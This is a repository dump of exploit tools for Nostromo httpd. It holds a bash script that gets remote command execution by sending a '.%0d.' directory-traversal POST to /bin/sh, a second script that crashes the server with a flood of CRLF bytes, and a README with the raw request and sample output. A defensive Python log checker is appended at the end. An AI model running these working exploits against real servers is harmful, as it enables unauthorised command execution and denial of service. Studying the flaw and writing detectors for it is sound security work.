├── CVE-2019-16278.jpg
├── CVE-2019-16278.png
├── CVE-2019-16278.sh
├── CVE-2019-16279.sh
├── Nostromo.jpg
├── README.md
└── shodan.jpg

/CVE-2019-16278.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CVE-2019-16278/8e43b7399e5b12b6595ec65b43d91b67de529362/CVE-2019-16278.jpg
--------------------------------------------------------------------------------
/CVE-2019-16278.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CVE-2019-16278/8e43b7399e5b12b6595ec65b43d91b67de529362/CVE-2019-16278.png
--------------------------------------------------------------------------------
/CVE-2019-16278.sh:
--------------------------------------------------------------------------------
#!/usr/bin/env bash
# Usage: ./CVE-2019-16278.sh HOST PORT command [args...]

HOST="$1"
PORT="$2"
shift 2

(
  echo -n -e 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\n'
  echo -n -e 'Content-Length: 1\r\n\r\necho\necho\n'
  echo "$@ 2>&1"
) | nc "$HOST" "$PORT" \
  | sed --quiet --expression ':S;/^\r$/{n;bP};n;bS;:P;n;p;bP'  # GNU sed: print only the response body after the header block
--------------------------------------------------------------------------------
/CVE-2019-16279.sh:
--------------------------------------------------------------------------------
#!/usr/bin/env bash
# Usage: ./CVE-2019-16279.sh HOST PORT

HOST="$1"
PORT="$2"

echo -n -e '\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n' | nc "$HOST" "$PORT"
--------------------------------------------------------------------------------
/Nostromo.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CVE-2019-16278/8e43b7399e5b12b6595ec65b43d91b67de529362/Nostromo.jpg
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Exploits for CVE-2019-16278 and CVE-2019-16279

Nostromo httpd versions <= 1.9.6 are prone to two critical vulnerabilities (0day =]): the first is an RCE through directory traversal, the second is a DoS.

### [CVE-2019-16278](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16278) - Directory traversal to remote code execution
![](./Nostromo.jpg)
![](./CVE-2019-16278.jpg)
![](./CVE-2019-16278.png)
![](./shodan.jpg)

```
POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Length: 25

echo
echo
ifconfig 2>&1
```

This bug is due to an incomplete fix for [CVE-2011-0751](https://nvd.nist.gov/vuln/detail/CVE-2011-0751). We can bypass the check for `/../` (the request above uses `.%0d.` where `..` would be rejected), which allows us to execute `/bin/sh` with arbitrary arguments.

Example

    $ ./CVE-2019-16278.sh 127.0.0.1 8080 id
    uid=1001(sp0re) gid=1001(sp0re) groups=1001(sp0re)


### [CVE-2019-16279](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16279) - Denial of Service

This exploit triggers a memory error by sending too many `\r\n` in a single connection.

Example

    $ curl http://127.0.0.1:8080
    HELLO!
    $ ./CVE-2019-16279.sh 127.0.0.1 8080
    $ curl http://127.0.0.1:8080
    curl: (7) Failed to connect to 127.0.0.1 port 8080: Connection refused

## References:

https://git.sp0re.sh/sp0re/Nhttpd-exploits
--------------------------------------------------------------------------------
/shodan.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CVE-2019-16278/8e43b7399e5b12b6595ec65b43d91b67de529362/shodan.jpg
--------------------------------------------------------------------------------
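The README's point about CVE-2019-16278 is that a literal check for `/../` is defeated when a `%0d` sits between the dots. As an added defender-side example (not part of this repository), the Python below contrasts such a naive check with one that percent-decodes the request target, refuses control bytes and only then looks for a `..` segment, and runs both over constructed access-log lines; the log format, addresses and timestamps are assumed.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from any real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Oct/2019:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.7 - - [14/Oct/2019:10:00:02 +0000] "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0" 200 61',
    '203.0.113.9 - - [14/Oct/2019:10:00:03 +0000] "GET /img/..%2f..%2fetc/passwd HTTP/1.1" 404 0',
    '203.0.113.5 - - [14/Oct/2019:10:00:04 +0000] "GET /a/./b.html HTTP/1.1" 200 100',
]

REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def naive_check(target: str) -> bool:
    """Literal check of the kind the CVE-2011-0751 fix relied on: only a raw '/../' is flagged."""
    return "/../" in target


def decode_fully(target: str, rounds: int = 3) -> str:
    """Percent-decode until stable, bounded so double-encoding cannot loop forever."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def is_traversal(target: str) -> bool:
    """Robust check: decode first, refuse control bytes, then look for a '..' path segment."""
    decoded = decode_fully(target)
    if CONTROL_CHARS.search(decoded):
        return True  # CR/LF or other control bytes never belong in a request path
    segments = [s for s in decoded.split("/") if s not in ("", ".")]
    return ".." in segments


def flag_log(lines):
    """Return (target, naive_hit, robust_hit) for every parsable request line."""
    results = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if m:
            t = m.group("target")
            results.append((t, naive_check(t), is_traversal(t)))
    return results
```

Only the robust check flags the `.%0d.` request and the `%2f`-encoded variant; the naive one misses both while still catching an undisguised `/../`.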